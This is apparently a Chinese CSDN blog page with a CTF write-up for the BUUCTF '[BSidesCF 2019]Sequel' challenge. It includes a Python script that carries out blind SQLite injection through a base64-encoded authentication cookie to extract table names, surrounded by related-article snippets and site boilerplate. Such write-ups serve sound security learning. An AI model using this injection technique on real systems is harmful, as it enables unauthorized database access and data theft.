BUUCTF--[BSidesCF 2019]Sequel

最新推荐文章于 2022-07-03 17:18:13 发布
最新推荐文章于 2022-07-03 17:18:13 发布
阅读量604 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119735645
版权

进入后是一个登录页面

 爆破之后的到帐号和密码都是guest

这里有个很隐晦的提示,Maybe the admin likes it too?
查看Cookie,使用base64解密

接下来使用cookie注入,使用大佬的脚本

import requests
import base64
import string
import sys
out = ""
while True:
    for letter in string.printable:
        tmp = out + letter
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(tmp + '%')
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get('https://sequel-9cba4c8e.challenges.bsidessf.net/sequels', cookies={"1337_AUTH" : payload})
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break
Uzero.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sequel-pro-1.1.2 sequel-pro-1.1.2
04-03
Sequel Pro是一款强大的MySQL数据库管理工具,主要用于Mac OS X操作系统。这款开源软件提供了一个直观、用户友好的图形界面,使得数据库管理和操作变得简单易行。版本1.1.2是Sequel Pro的一个特定发行版,可能包含了...
[BSidesCF 2019]Sequel SQLite注入~~
a3320315的博客
02-15 1432
题目描述 首先是登录,我们爆破一下就好了~~ 然后得到用户名和密码均为guest~~ 这时登录成功后会返回一个cookie,而且长得很可疑~~ set-cookie: 1337_AUTH=eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9; HttpOnly base64 解密一下得到 {"username":"guest","passwor...
BUU刷题记录——6
weixin_43610673的博客
09-21 1000
[De1CTF 2019]Giftbox De1CTF Web WriteUp – 赵 login命令处盲注获取登录密码 登陆后其他可用命令 targeting code position =>储存一条 $code = “position”; launch => 将上面 targeting 起来的 code 按照字典序跑一遍。 destuct => 清空,恢复初始状态 利用php的动态变量执行函数{$a($b)},外面包个 {},里面的东西会被执行后拿返回值..
[BSidesCF 2019]Kookie and [BSidesCF 2020]Cards
shinygod的博客
04-08 3793
知识点:cookie伪造 [BSidesCF 2019]Kookie 提示我们要以以admin身份登录,还告诉我们在cookie中,那答案呼之欲出。 在cookie中加入username=admin [BSidesCF 2020]Cards 做题目之前先了解一下21点的规则: 二十一点玩法规则和概率在二十一点游戏中,拥有最高点数的玩家获胜,其点数必须等于或低于21点;超过21点的玩家称为爆牌。 2点至10点的牌以牌面的点数来相加,J、Q、K 每张为10点。 A可记为1点或为11点,若玩家会因A而爆牌则
web buuctf [BSidesCF 2019]Kookie
weixin_44214568的博客
04-12 448
知识点:cookie cookie 是一个非常具体的东西,指的就是浏览器里面能永久存储的一种数据。跟服务器没啥关系,仅仅是浏览器实现的一种数据存储功能。 cookie由服务器生成,发送给浏览器,浏览器把cookie以KV形式存储到某个目录下的文本文件中,下一次请求同一网站时会把该cookie发送给服务器。 1.开题: 想复杂了--做了一堆工作,最后~ 2.提示:a.需要cookie b.以用户名admin登录 添加cookie:username=admin flag{67eb.
[BUUCTF][BSidesCF 2019]Pick Tac Toe
Y4tacker的博客
10-17 2678
在网页源代码当中发现 因此我们只需要按顺序post三个value来战胜ai,我分别是ul,c,bl
sequel-pro-lxw1.1.2.dmg.zip
05-17
Sequel Pro是一款专为Mac用户设计的MySQL数据库管理工具,其功能强大且用户友好,深受...通过下载并安装"sequel-pro-lxw1.1.2.dmg.zip"压缩包,你将能够开始探索和利用Sequel Pro的强大功能,提升你的MySQL管理体验。
Sequel-Pro-Build-3477d22387
12-04
Sequel-Pro-Build-3477d22387.zip这个压缩包中,包含的主要文件是"Sequel Pro.app",这是一个可执行的应用程序文件,用于在Mac OS系统上运行Sequel Pro。安装时,只需将这个.app文件移动到应用程序目录即可开始...
sequel-pro-1.1.2 mac
08-08
sequel-pro-1.1.2 mac上最好用的数据库工具
sequel-activerecord_connection:允许Sequel重用ActiveRecord连接
03-21
sequel-activerecord_connection 这是的扩展,允许其将现有的ActiveRecord连接重用于数据库交互。 如果您使用的库使用Sequel进行数据库交互(例如或 ),但是要避免创建单独的数据库连接,则此方法很有用。或者,...
buu-day08
anwen12的博客
01-05 572
又是早起刷题的一天 0x01 [FBCTF2019]Products Manager sql约束注入 在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断 mysql字符串比较 mysql == `mysql空格空格空格空格空格空格空格空格空格空格 可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。 插入 name: facebook .
BUUCTF 个人做题记录【7-03】
qq_61620566的博客
07-03 1441
学习才会进步
BUUCTF:[BSidesCF 2019]Mixer
末初的CSDN博客
04-06 691
知识盲区题 不多bb了,涉及加密的看不太懂,直接放参考链接,记录一下 https://github.com/beerpwn/ctf/tree/master/2019/BSidesSF_CTF/web/mixer https://blog.csdn.net/a3320315/article/details/104335989?depth_1-utm_source=distribute.pc_rele...
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 3956
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
BUUCTF:[BSidesCF 2019]Pick Tac Toe
末初的CSDN博客
08-05 753
题目地址:https://buuoj.cn/challenges#[BSidesCF%202019]Pick%20Tac%20Toe 九个格子每个对应了一个id号,可以通过抓包修改已经提交了的id号,实现三个连线
BSidesSF 2019 部分writeup
Kr的博客
03-06 2424
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
[BSidesSF 2019]Mixer ECB加密
a3320315的博客
02-15 1449
题目介绍 这儿需要我们登录,根据题目提示,我们需用admin登录就能拿到flag,我们先随便登录一下试试~~ 这儿返回了cookie,应该是某种加密~~ 但是题目并没有提示,尝试解码也并没有特别明显的线索,后来随便改一下user的值,发现报错,并且返回我们这儿猜测是cbc加密,因为其它的我也不知道 根据题目我们知道,解码应该为 {"first_name":"ma","last_name":"jia...
32C3 CTF 两个Web题目的Writeup
weixin_34320159的博客
03-08 164
一个狗 · 2015/12/31 11:570x00 简介作为一个销售狗,还能做得动Web题,十分开心。 这次搞了两个题目,一个是TinyHosting,一个是Kummerkasten。0x01 TingHostingA new file hosting service for very small files. could you pwn it?http://136.243.194.53/可以首...
BUUCTF:[GUET-CTF2019]虚假的压缩包
末初的CSDN博客
04-07 3600
虚假的压缩包是伪加密,修改第二个PK后五位为偶数即可 RSA,解密脚本如下 import gmpy2 p=gmpy2.mpz(3) q=gmpy2.mpz(11) e=gmpy2.mpz(3) l=(p-1)*(q-1) d=gmpy2.invert(e,l) c=gmpy2.mpz(26) n=p*q ans=pow(c,d,n) print ans 解压密码是:答案是5,用于解压另一个...
mac上安装sequel ace
最新发布
07-28
要在 Mac 上安装 Sequel Ace,请按照以下步骤进行操作: 1. 打开你的浏览器,访问 Sequel Ace 的官方网站:https://github.com/Sequel-Ace/Sequel-Ace 2. 在该页面上,你可以看到一个绿色的按钮,上面写着 "Code",点击它,然后选择 "Download ZIP" 来下载 Sequel Ace 的源代码压缩包。 3. 下载完成后,解压缩该压缩包。 4. 进入解压缩后的文件夹,并找到 Sequel Ace 的应用程序文件(通常是一个带有 `.app` 后缀的文件)。 5. 将该应用程序文件拖动到你的 "Applications" 文件夹中。 6. 现在,你可以在 Launchpad 或者 Finder 中找到 Sequel Ace 应用程序,并点击它来运行。 这样,你就成功地在你的 Mac 上安装了 Sequel Ace。希望这能帮到你!如果有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值